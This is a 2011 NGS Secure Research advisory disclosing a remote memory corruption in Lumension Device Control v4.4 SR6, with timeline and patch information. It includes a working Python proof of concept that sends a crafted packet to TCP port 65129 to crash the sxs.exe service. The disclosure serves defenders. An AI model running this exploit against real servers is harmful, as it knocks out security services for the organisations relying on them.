=======
Summary
=======
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <[email protected]>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published
========
TimeLine
========
Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011
===========
Description
===========
Sending a specially crafted packet to TCP port 65129 causes the sxs.exe service running on the Lumension application server to terminate.
=================
Technical Details
=================
A simple PoC is presented here:
#!/usr/local/bin/python
import sys
from socket import *
import os
if (len(sys.argv)!=2):
    print "\n--------------------------------------------------"
    print "Usage: %s <target IP>" % sys.argv[0]
    print "--------------------------------------------------\n"
    exit(0)
host=sys.argv[1]
port=65129
packet1 = "\xec\x02\x00\x00" #length of remaining packet
packet1 += "\xc9\x00\x00\x00" #some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61" #crash occurs here
packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()
===============
Fix Information
===============
This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/
NGS Secure Research
http://www.ngssecure.com